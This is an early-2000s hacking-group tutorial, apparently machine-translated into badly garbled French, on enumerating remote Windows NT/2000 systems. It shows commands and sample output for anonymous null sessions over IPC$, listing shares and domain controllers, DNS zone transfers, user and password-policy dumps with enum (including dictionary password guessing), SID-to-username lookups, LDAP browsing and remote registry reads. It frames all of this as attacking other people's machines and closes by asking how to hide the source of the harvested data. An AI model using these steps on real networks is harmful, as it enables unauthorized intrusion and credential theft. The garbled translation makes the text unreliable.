Articles pour le pirate non seulement

: [Équipe de sécurité LWB - lwb57]:
-------------------------------------------------- -----------------
| 27.08.2004 | écrit par Gotius // lwb57 |
| e-mail: gotius [at] terres [dot] ru | contacter: www.lwb57.org |
-------------------------------------------------- -----------------
| = --- --- | Windows Inventaire | --- --- = |
-------------------------------------------------- -----------------


Cet article, je veux consacrer les utilisateurs qui souffrent depuis longtemps de Windows.
Je ne suis pas même cent fois prononcer le mot terrible de tous les pépins
95/98. Je ne vais pas dire que, après le problème de conformité 2000 a eu lieu
XP. Je veux écrire sur 2000. Je dois dire que personnellement, je
avis, il amy bon de sortir de tous, mais pas comme un serveur.
En tant que plate-forme de travail I, je pense déjà que je vais utiliser
à la fin du temps. Ceux de la «méga-cool-hatskery" que je
Maintenant crier qu'il n'y a pas mieux que les Knicks. Immédiatement j'envoie à / dev / null, parce
Nix Je reconnais que très objectifs, très graves dans le premier
tout piratage / sécurité et ainsi de suite, mais le type de document, je dois
Je ne vais pas monter. Tous les commentaires s'il vous plaît envoyer à ce compte, sur le déjà mentionné
répondre à moi.

Alors, je me tourne plus au point, ou plutôt 2000 / NT. Je pense que personne ne
Il est pas un secret que le NT est malade trop
beaucoup d'informations sur toute demande. Cette occupation dangereuse
engagé protocole CIFS / SMB (Common Internet File System / serveur
Message Block). Ces protocoles sont, malheureusement, sont trop importants pour
services de réseau, de sorte que vous ne pouvez pas les abandonner. Bien que, dans
2000, vous pouvez facilement utiliser TCP / IP sans NetBIOS, mais
les bugs restants demeurent.

Maintenant, je ne veux pas que quelqu'un se précipita sur la recherche de corps, qui serait
tous les énoncés pour nous. Rappelons-nous que la même Microsoft rend
notre vie plus facile, mais plutôt le même qui leur est arrivé pour libérer NTRK (NT
Kit de ressources). Bien entendu, ce produit est l'objet du premier
la nécessité pour les administrateurs NT, mais il contient des utilitaires
qui sont donc utiles craqueur (qui est un système à distance
gestion). Donc pack pour 2000 continue la tradition de glorieux.

Je veux juste dire que tout sera beaucoup plus efficace si nous voulons
Tout d'abord, établir une "connexion zéro" ou "session null" (qui
vous aimez). Ceci est un point sensible CIFS / SMB et NetBIOS.
A cet effet, le port 139 (ouvert par défaut) pour être ouvert,
Et ainsi, avec l'aide de la connexion zéro nous donne l'occasion de
utiliser des protocoles, alors que nous ne même pas l'authentification NIS +.
Comme dans les précédents articles, le premier endroit où je divulguerai
«Les biens familiaux" OS.
Donc, pour ouvrir une connexion, il faut taper la commande
---
net use \\ 123.45.78.23 \ IPC $ "" / u: ""
---
Ainsi, nous établissons un canal caché entre les processus sur
Protocole IPC $, en tant qu'utilisateur anonyme (/ u: "") et
un mot de passe vide ( ""). Si tout va bien, nous aurons notre
Graal, donc nous allons être en mesure de recevoir le Vieux, non seulement sur les ressources du réseau,
utilisateurs, des groupes, mais nous ne pouvons même obtenir les clés de registre et
etc. Il y a d'autres noms pour cet écart, mais ...
1. Je ne me souviens tout simplement pas (pas obligé)
2. Ce nom est compris par tous, alors ne soyez pas peur de l'utiliser.
Pour les administrateurs disent que de zéro connexions peuvent être évitées,
interdisant de tels composés dans Sec local. Politique Cadre (sinon
trouver, puis écrire sur le savon, montrer sur les doigts). Et pour le plaisir de
les pirates futurs disent que l'utilité de sid2user, que je mentionnerai
plus tard, il est toujours en cours d'exécution, même lorsque interdit zéro connexions
(Toutes les lettres de remerciement directement au projet de loi).

Donc, maintenant je me propose d'attirer leur attention sur tous les plaisirs
NetBIOS. Je pense que personne ne doit expliquer ce qu'elle est.
Je répète encore une fois, si vous voulez que tout soit comme une horloge, de sorte
zéro installer Connect, puis tout le reste. Et pourtant, je
plus loin, je ne vais pas donner lieu à des données réelles et IP réelle, comme je peux
tomber sous l'article, de sorte que tout sera peu changé.

Donc, pour obtenir les noms des domaines de réseau, nous utilisons
équipe (de kom.str. 2000 / NT) env. Il est très important pour les personnes
qui yuzaet lokalku.
---
net view / domaine nous obtenons quelque chose comme ça ...
domaine
----------------------------------
DOMAIN_NAME1
DOMAIN_NAME2
DOMAIN_NAME3
...

Ensuite, nous pouvons voir tous les ordinateurs d'un certain domaine
---
vue Net / domain: DOMAIN_NAME2
******************************
Nom du serveur Remarque
-----------------------------------
\\ TITO Je suis ici
\\ MITO Il est pas
\\ LITO Emm ... qu'est-ce que cela signifie
\\ VASYA_PUPKIN Ou! Yo!

Il n'y a pas de secret pour personne que si nous les pingué avant, nous pouvons
utiliser IP à la place le nom du serveur (par exemple \\ 124.11.48.15).

En principe, nous pouvons obtenir une image du nom de la table avec la commande
nbtstat, spécifiant le paramètre A et l'adresse IP définie. Nous recevons environ
suivant
---
C: \ Documents and Settings \ an> nbtstat -A 10.1.5.10

Local Area Connection:
noeud Adresse IP: [10.1.5.10] Area Code: []

Tableau NetBIOS noms des ordinateurs distants

Nom Type État
-------------------------------------------------- -
INet ~ services <1C> GROUPE Enregistré
IS ~ HEXDN ...... <00> UNIQUE Enregistré
HEXDN <00> UNIQUE Enregistré
HEXDN <03> UNIQUE Enregistré
AN <03> UNIQUE Enregistré
RFK <00> GROUPE Enregistré
RFK <1E> GROUPE Enregistré
HEXDN <20> UNIQUE Enregistré
RFK <1D> UNIQUE Enregistré
..__ MSBROWSE __. <01> GROUPE Enregistré
ADMIN <00> UNIQUE Enregistré

Adresse Card (MAC) = 00-01-20-F2-37-7C

Donc, nous pouvons voir ici que nous avons le nom de l'ordinateur HEXDN,
qui appartient au RFK de domaine, et plusieurs noms d'utilisateur dans nashёm
de cas que l'administrateur.
Le droit du nom des services NetBIOS ont des codes, si bref, le
<00> Ce service est un poste de travail ou un nom de domaine.
<03> Ce service de diffusion transféré à l'ordinateur / utilisateur
<1D> navigateur principal
<1E> Service prosotra
<20> Ceci est le service Serveur
Le reste ... RTFM

Malheureusement, nous avons maintenant besoin d'une fonctionnalité qui est inclus dans NTRK,
il nltest. Ainsi, nous pouvons savoir quels contrôleurs de domaine
sont primaire (PDC), et qui secondaire (BDC) ... A cet effet, nous
Vous devez entrer le nltest / DCLIST: domain_name2
---
Liste des pays en développement dans le domaine domain_name2
\\ TITO (PDC)
\\ MITO
\\ LITO
...

Ensuite, apprendre les plus délicieux ... ballons en utilisant une session null, et notre
commande net view
C: \ Documents and Settings \ an> net view \\ TITO
Actions dans le \\ TITO

Nom Type de réseau Utilisez un commentaire

-------------------------------------------------- ------
D entraînement
disque des Jeux
disque Films
SAM80 (D) Disc
SCSI (I) lecteur
Disque vidéo
films sur disque
La commande terminée avec succès.

Courir un peu en avance pour dire que si nous obtenons le droit
utilisateur privilégié, nous pouvons utiliser
srvcheck, d'apprendre non seulement sur les ballons et les utilisateurs autorisés,
mais aussi les ressources cachées. En outre, srvinfo -s ... essayez, vous
comme elle ...

Si vous ne souhaitez pas utiliser la ligne de commande, vous pouvez
utiliser les outils de la Légion, Nat ou DumpSec. Et comme une bonne
utilitaire enum.

Suivant serait bien, nous bondir sur Win 2K.
Lorsque je dis la première que nous avons besoin juste pour obtenir
des données sur le DNS. Si quelqu'un se souvient, DNS est utilisé pour
conversion d'un tel nom mignon comme mail.ru dans son adresse IP réelle.
Si vous revenez plus près de notre sujet, les noms spatiaux actifs
répertoire est basé sur le DNS, mais dans Win 2000 DNS très bien
pour notre prochaine tâche ...
Je viens de décrire ce processus avant, alors maintenant je viens de rappeler
commande Nslookup
et alors
Serveur nc.dom.net
Ls -d nc.dom.net
-------------------------------------------------- ---
C: \ Documents and Settings \ an> nslookup
Serveur: ns.dom.net
Adresse: XX.XXX

> Ls -d dom.net
[Ns.dom.net]
dom.net. SOA ns.dom.net root.dom.net. (2003222838 28800 7200 604800 86400)
dom.net. NS ns.dom.net
dom.net. MX 20 dom.nex.com
dom.net. MX 30 ns.dom.net
dom.net. MX 40 gateway.dom.net
dom.net. A XX.X.XX.XX
OEM43261 TXT "31b066c632f3c44570893fb11366916a29"

OEM43261 A 10.1.5.32
cd1 A 10.1.5.14
ns A XX.X.XX.XX
ns A 10.1.5.1
ns A 192.168.0.1
courrier CNAME ns.dom.net
FSBP A 10.1.5.55
Un utilisateur 10.1.5.236
utilisateur TXT "31347d492f64a86fb88d301a22799a516e"

ns1 CNAME ns.dom.net
Klad A 10.1.5.16
epson A 10.1.5.12
Copieur TXT "313c5b23d4a74d4beb86e5e9999827232b"

www CNAME ns.dom.net
fs1 A 10.1.5.11
OEMCojhtdjt TXT "31a27188d85ff233a56e0a4d2e14713cdf"
-------------------------------------------------- ---
Compte tenu de la spécificité de la victoire 2K, l'enregistrement sera déchiffrer ...
Service.Proto.Name TTL CLASSE SRV PROIRITY POIDS PORT TARGET

Nous avons également une bonne idée de faire le point sur les utilisateurs, ici nous
utiliser enum, égoutter de l'Internet
---
Enum -U -d -P -L -c 120.13.14.56
Serveur: 120.13.14.56
Configuration de la session ... succès
la politique de mot de passe:
Longueur Min: aucun
...
Seuil de verrouillage: aucun
politique de lsa ouverture: succès
noms:
netbios: mycom.net
domain: mycom.net
...
domaine approuvé:
sysops
PDC: CORP-DC
netlogon fait par un serveur PDC
obtenir la liste des utilisateurs (passe 1, indice 0) ... le succès obtenu 12
administrateur
Puter / domaine
Attributs:
Stis attributs: ...
Guest (...)
attributs: désactivé
...
...
Vous pouvez même mentionner que ce Utila vous permet de connaître votre mot de passe
un utilisateur à la fois, il est nécessaire de préciser la
-D -u -f <fichier de dictionnaire>

Inclus NTRK ont plus de gâteaux, qui nous aideront usrstat,
showgrps, local et mondial. Et il y a aussi une équipe dumpsec
DumpSec /computer=\\157.18.45.83 / rpt = usersonly / saveas = tsv /outfile=C:\haked\fuck.txt
L'inscription est très facile, et vous pouvez regarder pour vous-même, mais ne pas oublier le
Null Session !!!

Nous pouvons otindefitsirovat comptes des utilisateurs via
user2sid / sid2user. Ces utilitaires permettent d'obtenir l'identificateur de sécurité
utilisateur (SID). SID est un identificateur de longueur variable qui
Elle est donnée par l'utilisateur lors de l'installation. Ce sujet me semble
assez vaste, je vais donc le sanctifier uniquement sur demande, mais
donc ... si vous décidez que vous n'avez pas besoin, je vais dire que, avec l'aide de
les services publics peuvent obtenir tous les groupes et tous les utilisateurs de la télécommande
voiture ...

In Win 2K introduit un nouveau LDAP Pribluda (Lightweight Directory Access
Protocole). Les gens ordinaires appellent des noms est Active Directory. là
Il fournit une vue logique unifiée de tous les objets
réseau d'entreprise. De là, nous pouvons apprendre beaucoup d'informations
les utilisateurs et les groupes ... pour cela est l'outil natif ldp
(NTRK). Heureusement pour nous, si nous donnons cet utilitaire contrôleur
Domaine Win 2K, dans le même temps, nous allons connaître le mot de passe des clients (si
est, ce qui est peu probable), nous passons facilement notre inventaire ...
Cette utila possède une interface graphique afin qu'il ne causera
difficultés. Première prikonnektimsya (Connection-> Connect), le port 389
ou 3268 si l'autre, vous devez spécifier, mais, fondamentalement, ceux-ci.
eV Suivant (Connection-> Bind), puis sélectionnez Affichage-> Arbre
et indiquer (si vous avez, par exemple, bigdc.ourfirm.org) dc = ourfirm,
dc = org. Et nous allons obtenir notre information, je ne peux pas conduire une capture d'écran, de sorte
cette sorte par vous-même, il y aura des questions - écrire.

La dernière chose que je vais décrire ce que nous aurons accès au registre. cette
sera vrai si l'admin - moron et n'a pas interdit cette opération,
parce que elle est fermée aux connexions de point zéro.
Par exemple:
---
REGDMP -m \\ 195.47.87.89 HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run
-------------------------------------------------- -------
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run
Nvclock = rundll32 nvclock.dll, fnNvclock
Gestionnaire de synchronisation = mobsync.exe / logon

Conclusion:
-----------
A mon grand regret, je ne pouvais pas écrire cet article, où
Je suis en mesure de découvrir que tout ce qui concerne les fenêtres d'inventaire.
Au contraire, je suis en mesure d'examiner l'article sur Okoshnym natif
Médicaments. En principe, il était mon but, je veux dire
Décrire les outils natifs, mais bien sûr, il serait préférable de le faire
plus profond. Pourquoi je ne l'ai pas, en principe, la réponse est simple:
Connaître les bases - très facile à creuser un peu plus profond. En fait, rien
le complexe se trouve pas seulement les touches que vous recevrez un peu différent
l'information. Par exemple IP au lieu des noms. Dans tous les cas, si la profondeur
rentable sur les mots de passe inventaire est pas si important, alors
il existe de nombreux outils qui sont heureux de rendre votre vie plus facile. Il suffit de faire pas
Rappelez-vous que beaucoup de l'information qu'ils vous fournissent,
va rester dans les coulisses, mais il est sacrément utile!


PS Comment puis-je modifier les listes # de balsya de sorte qu'il était impossible de
comprendre la source à partir de laquelle ils ont reçu tous les mêmes.


+ ------------------------------------------------- ---------------- +
| Ñopyright 2002-2004 par l'équipe de sécurité LWB. |
+ ------------------------------------------------- ---------------- +